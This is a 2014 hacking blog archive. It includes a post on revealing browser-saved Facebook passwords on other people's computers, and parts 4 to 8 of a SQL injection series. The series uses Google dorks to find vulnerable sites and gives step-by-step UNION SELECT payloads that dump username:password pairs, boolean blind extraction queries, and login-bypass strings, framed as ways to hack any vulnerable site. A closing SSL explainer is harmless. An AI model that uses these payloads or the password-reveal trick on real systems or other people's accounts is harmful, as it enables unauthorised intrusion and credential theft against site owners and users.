New Post

Rss

Thursday, December 18, 2014
How to Hack Facebook Account Password saved on web browser

How to Hack Facebook Account Password saved on web browser

In my previous articles on Hacking Facebook, we have learnt many techniques to hack facebook account like Social Engineering, Phishing, Keylogging, Tabnabbing, 3 friend password retrieval technique and much more. Today i am going to explain, how to hack Facebook account passwords which are saved in any web browsers in less than 5 minutes. Now you all will be thinking, we can view saved passwords easily by going into settings and then saved passwords in web browsers.  But what if saved passwords are protected by master password. This Facebook password hacking technique will work on all web browsers available in market. 

Normally people save their passwords on their personal laptops or computers to avoid typing and remembering passwords again and again. To add additional security to stored passwords, all web browsers provides master password feature( or windows password ) which protects other users to view stored passwords. 

Lets learn how to hack Facebook account password saved on Google Chrome Web browser for an example.  We know password is store on chrome browser, let's see if we tries to view by going into settings and then manage passwords, it will show something like below:


How to Hack Facebook Account Password saved on web browser
Stored Password on Google Chrome Web Browser
When you click on show it will ask for windows passwords as shown below:

How to Hack Facebook Account Password saved on web browser
Password Protected by Windows Password

 If its your own machine then its fine, but if its your friend's or cyber cafe or someone else's machine whose password you don't know, then what will you do?

Do you want to know other way around to Hack Facebook Account password stored on web browser? If yes then continue reading.

1. Open Facebook website in your web browser, if user has password saved on machine then it will look something like below:

How to Hack Facebook Account Password saved on web browser
Hidden Password on Facebook Page

2. Go to Password column and right click in your Google Chrome or any other web browser and click on Inspect Element as shown below:

How to Hack Facebook Account Password saved on web browser
Inspect Password field element to view code behind this

3. After clicking on inspect, a pop up window with some source code with highlighted line is visible as shown below:

How to Hack Facebook Account Password saved on web browser
Code of Password column text box
4.  Now in above code you can see TYPE parameter as "password" which is deciding its CSS class i.e. its format. What you have to do is just replace the "password" value to "text" in TYPE parameter and you can see the password in displayable format as shown below:

How to Hack Facebook Account Password saved on web browser
Change TYPE to text in place of password
5. Now what?? Just check the Facebook Page to view saved password.

How to Hack Facebook Account Password saved on web browser
Password shown in plain text

That's it guys.

There are lot of positive aspects too to learn from this tutorial :
1. How to retreive password if you have forgot after saving it.
2. View what password you have typed. 
3. Use this technique to view passwords of all other websites :P i.e. whatever saved in browser :D 
4. Use to view friends passwords :P

Enjoy Learning and Learn Hacking! Surprise your friends using this technique and become their Geeko :P .
Tuesday, November 25, 2014
Union Exploitation Technique to Exploit SQL Injection Vulnerability | Injection attacks - Part 8

Union Exploitation Technique to Exploit SQL Injection Vulnerability | Injection attacks - Part 8

SQL Injection flaw is quite easiest to exploit and protect too but only when you know how to do it. In continuation to our Injection attacks tutorial series, today we will learn about Union Exploitation Technique to exploit SQL Injection Vulnerability. Union exploitation technique is most common and easiest way to exploit SQL injection vulnerability to hack into websites and if you know how to do it then its same the other way around i.e. Protect SQL Injection vulnerability to be exploited by Union Exploitation technique. So lets learn about Union Exploitation Technique in detail with help of examples.


Union Exploitation Technique to Exploit SQL Injection Vulnerability | Injection attacks - Part 8
Union Exploitation Technique to Exploit SQL Injection Vulnerability | Injection attacks - Part 8.





Note: This article is for education purposes only. Any misuse may lead to harsh cyber law charges and even imprisonment.

But before that let me brief all of you about what is Union Operator? Union is an inbuilt keyword in almost all databases which is used to join a query. In SQL, we normally used Union operator to link another SQL query with original query. Hackers use this concept to exploit SQL Injection flaws to run their own SQL queries to retrieve information like usernames, passwords and other juicy information from victims databases. 

Here's a brief about procedure that we are going to learn to exploit SQL Injection using Union Exploitation Technique:
1. Find the Vulnerable website which is vulnerable to SQL Injection.
2. Find the Number of Columns in website using Order by clause.
3. Find most vulnerable columns which can be used to exploit SQL Injection Vulnerability using Union operator.
4. Test run to validate that column found is vulnerable by querying version information.
5. Use Information Schema to get Table Names
6. Use Information Schema to get Column Names
7. Use Information Schema to get Column values. For example: Username, passwords, customer information.
Oops.... That's it all about Union Exploitation technique to exploit SQL injection vulnerability to own or hack any vulnerable website. Now lets learn in detail how to use union Exploitation technique to Exploit SQL Injection Vulnerability. 


Let's learn the process in detail.


Union Exploitation Technique to Exploit SQL Injection Vulnerability:



Step 1: Finding SQL injection vulnerable websites:

We have already learned this in our previous articles, if somebody missed here is brief:
Use Google to find Vulnerable website by searching for below query :


inurl:php?id=

There are several other dorks to find SQL injection vulnerable websites but above one is easiest and success rate almost 90-95%. 

Now Google search will display some results. Open any one of them, say 



www.example.com/shop.php?id=6

Now to check if its vulnerable to SQL Injection or not, just add '(single quote) at end of it i.e. query will become something like below:



www.example.com/shop.php?id=6'

Now if you get error something like below, then it means website is vulnerable to SQL Injection.



You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
or something like below:


Query failed: You have an error in your SQL syntax near ''6''' at line 1

or any other error.




Step 2: Finding Exact Number Columns in Website


Once you know that website is vulnerable to SQL Injection, next step is to find exact number of columns in website database. Which you can know by running below query :



www.example.com/shop.php?id=6 ORDER BY <NUM>--

Now say website has 16 columns, which you don't know then you can get it by using binary search approach. For example running below manner sequences:



www.example.com/shop.php?id=6 ORDER BY 10--

Result : Some page opens with data i.e. no error page.


Then incrementing it by 10 i.e.



www.example.com/shop.php?id=6 ORDER BY 20--

and so on until you get below error message :



Unknown column '<NUM>' in 'order clause' 

or any other custom message.


Once you get the above error message, then it means you exceeded the exact column numbers so decrease it one by once until to error is gone. Last successful page means exact column count. Say you get 16 columns. Then last successful request executed must be :



www.example.com/shop.php?id=6 ORDER BY 16--

This steps will give exact number of columns in the database of website.



Step 3: Finding Vulnerable Columns using UNION ALL clause.


Once you know the exact number of columns in database then you can get list of all vulnerable columns  by running below query:



www.example.com/shop.php?id=6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

This will result in some page and on that page some numbers will be displayed. Those are actually vulnerable columns. Now say 2, 4 and 8 are displayed on page. This means column 2, column 4 and column 8 are most vulnerable columns which can be used to run your own SQL queries.


If above query execution shows normal web page as it usually displays then it means query is failed. Then we used field exploitation technqiue by inserting '-' in ID value. So the query will become something like below:



www.example.com/shop.php?id=-6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

Wow, now you have some numbers scattered over web page, which means vulnerable columns on website.




Step 4: Test run to validate vulnerable columns



Now we have list of all vulnerable columns, next step will be validating that we are correct. 


Easiest way to validate is executing version() command in vulnerable column, for example, say column 2 was vulnerable:



www.example.com/shop.php?id=-6 UNION ALL SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--

Now in place of 2 on web page you will get the version number displayed. Check this for all vulnerable columns.


Step 5: Use information Schema to get Table Names


Now we know vulnerable columns of database, next step will be extracting table names from the database. This can be achieved by knowing concepts of Information schema. 

Learn more about information schema to extract table names here:
http://dev.mysql.com/doc/refman/5.1/en/tables-table.html


Using information schema we can execute query as if we are administrators. So in order to extract table names we will run below query on column 2 (vulnerable column).


www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema = database()--

Above query will give you complete list of tables present in the database. You know which table you need to search for Username and passwords :D.

Step 6: Use information schema to get Column names

Using the same concept used in step 5, we will use information schema to extract column names too. 

Learn more about Information Schema to extract column names:
http://dev.mysql.com/doc/refman/5.1/en/columns-table.html

Now to extract column names from database, below query will work like Bulls Eye:


www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.columns where table_schema = database()--
The above query will result into extracting all column names.


Step 7: Use Information Schema concept to get column values of required table

Well till now we have table names, column names. Only thing left is data from tables. Now say we got some table as USERS which has column names USERNAME and PASSWORD. In order to extract data from USERS table below query is sufficient :


www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from USERS--

Above query will result into displaying usernames and passwords in below format username:password as 0x3a is hex value for ':'.

That's it guys, now you have username, password, table names, passwords. What else do you need.

That's all for today, we will continue to learn more about injection attacks in later tutorials.

If you have any queries of doubts, feel free to ask.
Tuesday, October 28, 2014
Boolean Exploitation Technique to exploit SQL Injection Vulnerability | INJECTION ATTACKS - PART 7

Boolean Exploitation Technique to exploit SQL Injection Vulnerability | INJECTION ATTACKS - PART 7

In our Previous tutorial we learnt about SQL Injection characters and different exploitation techniques to exploit SQL Injection Vulnerability. From today we will start learning all exploitation techniques in details with help of examples starting from Boolean Exploitation Technique.

Boolean Exploitation Technique is basically an SQL Injection Exploitation technique where a set of Boolean operations are executed in order to extract juicy information regarding the tables of the database of an web application. Boolean Exploitation technique is mostly used in cases where Hackers have predicted that Blind SQL Injection is possible i.e. in cases where output of the operations or requests is not known. For example, consider an web application in which all the error messages are replaced with custom error messages (which does not reveal any important information to the users) by the web designer or developer i.e. Page may not return the SQL Error instead of SQL Error it shows 404 or 500 or some other custom messages. This method consists of carrying out a series of Boolean queries against the server, observing the answers and finally deducing the meaning of such answers.

Boolean Exploitation Technique to exploit SQL Injection Vulnerability
Boolean Exploitation Technique


Consider an example, suppose we have a vulnerable website say www.example.com and it has a parameter namely "Id" which is vulnerable to SQL Injection. Now suppose we execute the below request in our web browser :

http://www.example.com/index.php?id=1’

The above query will result into opening of one web page which might throw an custom error message say 404 or 500. If that happens, we suppose that below query is executed at backend of website:

SELECT Field1, Field2, Field3 FROM Users WHERE Id=’$Id’ 

As we have discussed in previous articles that above SQL is vulnerable to SQL Injection. Our current and most important GOAL is to get values of the username field which is currently not known as we only know about ID parameter as of now. The exploits or tests that we will execute now will aim to get the values of username filed character by character. This can be possible by using some set of inbuilt functions (i.e. standard functions) present in almost all databases. 

List of some important functions that we will use to extract information are below:
1. SUBSTRING (text, start_position, length) : This function returns a substring starting from the position “start_position” of text and upto length “length”. If “start_position” is greater than the length of text, the function returns a null value.

2. LENGTH (text): It gives back the number of characters in the input text.

3. ASCII (char): It gives back ASCII value of the input character. A null value is returned if char is 0.

There are lot more functions but above 3 are needed as of now.  Using these functions we will execute test on first character and once we get the value of first character, we will move to the second character and so on, until we get the complete value. SUBSTRING function will help us to select one character at a time (selecting a single character means to force the length parameter to 1), and the function ASCII, in order to obtain the ASCII value, so that we can do numerical comparison. The results of the comparison will be done with all the values of the ASCII table, until the right value is found. 

For example, lets try below value of "Id" parameter:

$Id=1’ AND ASCII(SUBSTRING(username,1,1))=97 AND ‘1’=’1 

So the URL will be something like :

http://www.example.com/index.php?id=1’ AND ASCII(SUBSTRING(username,1,1))=97 AND ‘1’=’1

And SQL Query will be something like :

SELECT Field1, Field2, Field3 FROM Users WHERE Id=’1’ AND ASCII(SUBSTRING(username,1,1))=97 AND ‘1’=’1’


The above example returns a result if and only if the first character of the field username is equal to the ASCII value 97. If we get a false value, then we increase the index of the ASCII table from 97 to 98 and we repeat the request. If instead we obtain a true value, we set to zero the index of the ASCII table and we analyze the next character, modifying the parameters of the SUBSTRING function. 

The only problem with above example is that how we will distinguish our tests which are returning true value from ones which are returning false value. This can be possible if we create a query which always returns false, so below value of ID can solve this problem for us :

$Id=1’ AND ‘1’ = ‘2 

So Query will be something like :

SELECT Field1, Field2, Field3 FROM Users WHERE Id=’1’ AND ‘1’ = ‘2’ 

Hence URL will be something like :

http://www.example.com/index.php?id=1’ AND ‘1’ = ‘2 

The above query will always returns false value. Does this rings a bell? Huh...

The above query execution will throw an error message (i.e. custom error message say 500). This will be the false value for our tests. Now this custom error message will help us to distinguish the values of test results i.e. which one is true and which one is false. 

Sometimes it may happen that above method does not work. For example, If the web server returns two different pages as a result of two identical consecutive web requests i.e. Boolean query executions, we will not be able to discriminate the true value from the false value. In these particular cases, it is necessary to use some filters that allow us to eliminate the code that changes between the two requests and to obtain a template for getting username character by character. Later on, for every Boolean request executed, we will extract the relative template from the response using the same function, and we will perform a comparison between the two templates in order to decide the result of the test.

In the above method, we haven't discussed about determining the termination condition i.e. when we should end the Boolean procedure. The technique to solve this problem uses one characteristic of the SUBSTRING function and the LENGTH function. When the test compares the current character with the ASCII code 0 (i.e., the value null) and the test returns the value true, then either we are done with the Boolean procedure (we have scanned the whole string), or the value we have analyzed contains the null character. To achieve this we will use below value of Id parameter :

$Id=1' AND LENGTH(username)=N AND '1' = '1 

where N is the number of characters we have scanned so far. Note: Null value is not counted in value of N.  

So the query will become something like below:

SELECT Field1, Field2, Field3 FROM Users WHERE Id='1' AND LENGTH(username)=N AND '1' = '1' 

And URL to hit above query will be something like :

http://www.example.com/index.php?id=1' AND LENGTH(username)=N AND '1' = '1 

The above query will return either true or false. If above query returns true that means we have extracted the complete value of username. If we get false, it means that username parameter contains a null character in between, so continue the Boolean procedure as explained above until you get the true condition. 

That's all about the Boolean Exploitation technique to Exploit SQL Injection Vulnerability. If you have any doubts, feel free to ask. Enjoy Learning! Happy Hacking!
Sunday, October 26, 2014
How to Exploit SQL Injection Vulnerability | Injection attacks - Part 6

How to Exploit SQL Injection Vulnerability | Injection attacks - Part 6

Previously we have learnt about standard SQL Injection and simple techniques to test SQL Injection Vulnerability. Today we will learn how to exploit SQL Injection vulnerability. There are lot of ways to exploit SQL Injection flaw, we will learn all of them one by one. Today i will brief about different Exploitation Techniques used to exploit SQL Injection Vulnerability.

Different ways to exploit SQL Injection Vulnerability :

1. Boolean Exploitation Technique
2. Union Exploitation Technique
3. Error Based Exploitation Technique
4. Out of band Connection Exploitation Technique
5. Time Delay Exploitation Technique
6. Stored Procedure Injection Exploitation Technique
7. Automated Exploitation Technique using SQLi Tools


But before starting with any of above topic, we must know what are all SQL Injection Characters ? Huh... SQL Injection characters are those characters which directly or indirectly results into SQL injection. More than 99% of SQL Injection attacks occurs only because of these characters parsing. I will not give complete list but will share most important one, because it can result into misuse of knowledge.

SQL Injection Characters :

 ' or " character String Indicators
' closes the string parameter. Everything after is considered part of the SQL command. 

 --      Single-line comment 
#      Single-line comment in MySQL or date delimiter in MS Access
/*…*/   multiple-line comment
+      Addition operator or Concatenation operator i.e. when used in an URL it becomes a white space
||     Concatenation operator in Oracle and Postgres Databases
-      Subtraction operator or a range indicator in CHECK constraints
%    Wildcard attribute indicator
=     Equality operator
<> !=     Inequality operators
><   Greater-than and Less-than operators
( )    Expression or hierarchy 
,       List item separator
.       Identifier qualifier separator
@var    Local variable
@@var      Global variable
?Param1=foo&Param2=bar    URL Parameters
PRINT useful as non transactional command
waitfor delay '0:0:10'  Time delay

The above SQL Injection characters are base for every SQL Injection. Hackers use these SQL Injection characters to successfully exploit an SQL Injection Vulnerability.

Also we have missed one thing in our previous article related to fingerprinting of database. Below are some differences that can be used to determine what db we are in if we have no other easier way. By trying out conditions using the 'and condition and '1'='1 statement we can determine what type of database we have connected to.


fingerprinting of database
Fingerprinting of database


In later articles we will learn each SQL Injection Exploitation Technique one by one in detail. Keep learning. Enjoy!
Sunday, October 12, 2014
How to test SQL Injection Vulnerability | Injection attacks - Owasp #1 Vulnerability - Part 5

How to test SQL Injection Vulnerability | Injection attacks - Owasp #1 Vulnerability - Part 5

In our previous article we have learned about Standard SQL Injection also known as Classical SQL Injection with set of examples. Today we will learn about "How to test SQL Injection flaws?"and SQL Database Fingerprinting as these two are major steps for exploitation of SQL Injection flaws. 

Exploitation of SQL Injection flaw depends on two basic things:
1. How to test that website or web application is vulnerable to SQL Injection i.e. knowing test subject is vulnerable or not.
2. Fingerprinting the database i.e. knowing the type of Database i.e. MySQL, Oracle, MS SQL etc..

So let's learn them one by one in detail for better understanding.


How to test that website or web application is vulnerable to SQL Injection attack?


In order to test a website or web application for SQL Injection vulnerability, first of all we must know when does a website or web application interacts with Database or DB. Most website and web applications interacts with their database when they have to retrieve a similar set of items from the some tables, for example during authentication ( user enters username and password for login which is stored in one of the tables of database), another example can be consider an eCommerce website which retrieves all its items details from some products table, another example can be search engine where search values are retrieved from some indexed table. 



How to test SQL Injection Vulnerability
How to test SQL Injection Vulnerability 


In order to craft the similar SQL which developer has used in his/her website or web application, Hacker has to note down all probable input fields including all hidden POST fields of POST request too. For doing this, Hacker can use tools like "TAMPER DATA (Firefox addon)" to alter the data in real time. Tamper Data allows hackers to manipulate all requests in real time, so this will allow hackers to visit all Hidden POST fields too.

1. Testing of certain special characters and keywords:
We will recommend to start your testing with adding an single quote(') or a semicolon (;) to the field or parameter in the request. For example :


http://www.example.com/product.php?id=10'

                                  or


http://www.example.com/product.php?id=10;

If this result into error, then this means website is vulnerable to SQL injection, we will learn exploitation techniques in next part. If no error comes test it further by adding Comment (/* or --) or using other keywords like 'AND' or 'OR' to modify the request.


2. Testing Fields with Content type:
This way of testing is very easy to perform, in this way Hacker needs to find out what type of values a field accepts. Suppose a field only accepts integer values, then pass String value in the field or parameter. Another way is to insert all special characters or insert encoded characters in the field. If the request result into an error then it means website is vulnerable to SQL Injection. For Example, say ID field only accept integer values and we try to insert string into it:


http://www.example.com/product.php?id=mycheck


Hackers need to monitor all the responses from the web server and have to look at the HTML/javascript source code too because sometimes the error is present inside them but for security reasons javascript error, HTML comments, etc is not presented to the user. A full error message provides lot of juicy information to the Hacker in order to attempt a successful injection attack. However, applications often do not provide so much detail: a simple '500 Server Error' or a custom error page or 404 response code might be issued, meaning that we need to use blind injection techniques. In any case, it is very important to test each field separately: only one variable must vary while all the other remain constant, in order to precisely understand which parameters are vulnerable and which are not.



Fingerprinting the Database:

All databases(DBMS) have their uniqueness associated with them and differs from each other on several aspects for example special commands, functions to retrieve data, other features etc.

Advance SQL Injection involves knowing of Database type and its features in order to exploit the flaw.


The first way to find out what back end database is used is by observing the error returned by the application. For example:

Web Application uses mySQL as backend database:



You have an error in your SQL syntax; check the manualthat corresponds to your MySQL server version for theright syntax to use near '\'' at line 1


Web Application uses Oracle as backend database:


ORA-00933: SQL command not properly ended

Web Application uses MS SQL as backend database:




Microsoft SQL Native Client error ‘80040e14’Unclosed quotation mark after the character string
and so on...


Alternate way to find the backend database is  to, try to inject into string field using concatenation technique.

For Example:


MySql: ‘Hack’ + ‘ing’


Ms SQL Server: ‘Hack’ ‘ing’


Oracle: ‘Hack’||’ing’


If string is concatenated properly then it confirms what backend database web application or website is using.


That's all for today friends. We will learn all SQL Injection Exploitation techniques one by one in detail in later articles.

If you have any doubts or queries feel free to ask.



Thursday, October 9, 2014
Standard SQL Injection | Injection attacks - Owasp #1 Vulnerability - Part 4

Standard SQL Injection | Injection attacks - Owasp #1 Vulnerability - Part 4

In our previous article we have learned about basic of Blind SQL Injection using untrusted data parsing. Today we will learn in detail about Standard SQL Injection (or Classical SQL Injection) attack in detail. Lets revisit what we have learned in previous article, we have learned about (OR 1=1) i.e. always true condition.

Standard SQL Injection | Injection attacks - Owasp #1 Vulnerability
Standard SQL Injection | Injection attacks - Owasp #1 Vulnerability


Consider an example that we have a table named "users" which contains login credentials and SQL query which validates data from login table is something like below:

SELECT * FROM Users WHERE Username='$username' AND Password='$password'

 If the query returns a value it means that inside the database a user with that set of credentials exists, then the user is allowed to login to the system, otherwise access is denied. The values of the input fields are generally obtained from the user through a web form. Suppose we insert the following Username and Password values:

$username = 1' or '1' = '1

$password = 1' or '1' = '1


Then the query will become something like:
SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1' 

If we suppose that the values of the parameters are sent to the server through the GET method, and if the domain of the vulnerable web site is www.example.com, the request will be something like below:

http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1 


After a short analysis we notice that the query returns a value (or a set of values) because the condition is always true (OR 1=1). In this way the system has authenticated the user without knowing the username and password.
In some systems the first row of a user table would be an administrator user. This may be the profile returned in some cases.


Above one was the typical example of SQL Injection which nowadays is not that much effective as most of developers use Encryption on password, usually MD5. So do imposing an encryption on passwords can protect databases? Answer is straight forward "NO". Lets consider an another example, which contains encryption employed in it. Say developer uses below SQL Query to authenticate users on website:

SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password'))) 

Now above query has two issues for Hackers to hack into this, first parenthesis and second one MD5 Encryption both highlighted in red. So first of all lets solve the problem of parenthesis. First of all we need to identify correct number of parenthesis specially opening ones, it is quite easy just keep on adding closing parenthesis until we get the correct number of closing parenthesis but why? Simply because we wish to bypass the second problem :D yes we want to comment the MD5 encryption within the query to bypass the authentication. Every DBMS has its own syntax for comments, however, a common symbol to the greater majority of the databases is /*. In Oracle the symbol is "--". 
In this case we will use below username and password to bypass:

$username = 1' or '1' = '1'))/*

$password = foo


So the query will become something like below:

SELECT * FROM Users WHERE ((Username='1' or '1' = '1'))/*') AND (Password=MD5('$password'))) 


Now due to the inclusion of a comment delimiter in the $username value, the password portion of the query will be ignored i.e. commented.

And the URL Request to execute above query will be something like :


http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))/*&password=foo 

This may return a number of values. Sometimes, the authentication code verifies that the number of returned records/results is exactly equal to 1. 

In the previous examples, this situation would be difficult (in the database there is only one value per user).

In order to go around this problem, it is enough to insert a SQL command that imposes a condition that the number of the returned results must be one. (One record returned) In order to reach this goal, we use the operator "LIMIT <num>", where <num> is the number of the results/records that we want to be returned. With respect to the previous example, the value of the fields Username and Password will be modified as follows:

$username = 1' or '1' = '1')) LIMIT 1/* 

$password = foo 

This will result into a query something like below:
SELECT * FROM Users WHERE ((Username='1' or '1' = '1')) LIMIT 1/* /*') AND (Password=MD5('$password'))) 


In order to execute above query, URL will be something like below:

http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1')) LIMIT 1/*&password=foo


The above URL will fetch the first value from the users table and will allow hackers to bypass the authentication of website.

That's all for today. We will learn more about SQL Injection Exploitation techniques in later articles. Keep Learning!



Friday, October 3, 2014
Secure Sockets Layer Tutorial | What is SSL | SSL Hackers Guide

Secure Sockets Layer Tutorial | What is SSL | SSL Hackers Guide

You might have heard some times that not to give your password or credit card information or any other sensitive information on public computers or on Facebook, yahoo etc chats.The reason why you might have heard that the Hackers have some ways to you would have probably heard that hackers have a way to steal your your credit card numbers , passwords etc.


Secure Sockets Lock Tutorial | What is SSL | SSL Hackers Guide
Secure Sockets Lock Tutorial | What is SSL | SSL Hackers Guide


A hacker can use different types of attacks such as Packet sniffing or ARP Poisoning to steal your sensitive information.

Secure Sockets Layer (SSL) is the most widely used technology for creating a secure communication between the web client and the web server. You must be familiar with http:// protocol and https:// protocol, You might be wondering what they mean. HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a secure communication.


Cryptography



If two users want to have a secure communication they can also use cryptography to accomplish it

For example: 

TFDVSF=Encrypted Text

SECURE= Decrypted Text

You might be wondering how i Decrypted it, Here i have used Algorithm=+ for the communication and the key is "1", What comes after S is T so as you can see that S is converted into T, What comes After is to letter E from the word secure if converted into F and so on, To help you understand this more better I am adding a Video - 






So If the hacker starts sniffing from between he will get Encrypted text and as the Hacker does not know the keys so he cant decrypt it, but if the attacker or hacker is sniffing from the starting point so he will get the key and can easily Decrypt the data.



Standard Communication VS Secure communication 



Suppose there exists two communication parties A (client) and B (server) 


Standard communication(HTTP)



When A will send information to B it will be in unencrypted manner, this is acceptable if A is not sharing Confidential information, but if A is sending sensitive information say "Password" it will also be in unencrypted form, If a hacker starts sniffing the communication so he will get the password.

This scenario is illustrated using the following figure -


Standard Communications HTTP
Standard Communications HTTP



Secure communication(HTTPS) 



In a secure communication i.e. HTTPS the conversation between A and B happens to be in a safe tunnel, The information which a user A sends to B will be in encrypted form so even if a hacker gets unauthorized access to the conversion he will receive the encrypted password (“xz54p6kd“) and not the original password.
This scenario is illustrated using the following figure - 


Secure communication(HTTPS)
Secure communication(HTTPS) 




How is HTTPS implemented?


HTTPS protocol can be implemented by using Secure Sockets Layer (SSL), A website can implement HTTPS by purchasing SSL certificate.

Which websites need SSL Certificate?


The websites where a private conversation is occurred, Websites related to online transactions or other sensitive information needs to be protected needs to SSL Certificate.



How to identify a Secure Connection?


In Internet Explorer and google chrome, you will see a lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website. 

If you are making an online transaction through Credit card or any other means you should check if https:// secured communication is enabled.

Source: RHA InfoSec
Designed by Hackingloops.